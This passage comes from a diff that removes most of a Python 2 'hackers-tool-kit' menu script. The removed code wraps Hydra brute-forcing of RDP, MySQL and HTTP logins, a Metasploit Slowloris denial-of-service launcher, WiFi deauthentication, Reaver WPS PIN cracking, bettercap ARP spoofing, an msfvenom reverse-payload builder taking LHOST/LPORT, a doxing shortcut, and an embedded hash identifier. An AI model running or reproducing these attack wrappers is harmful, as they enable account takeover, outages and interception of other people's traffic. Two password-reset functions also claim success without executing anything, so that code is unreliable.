-l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def 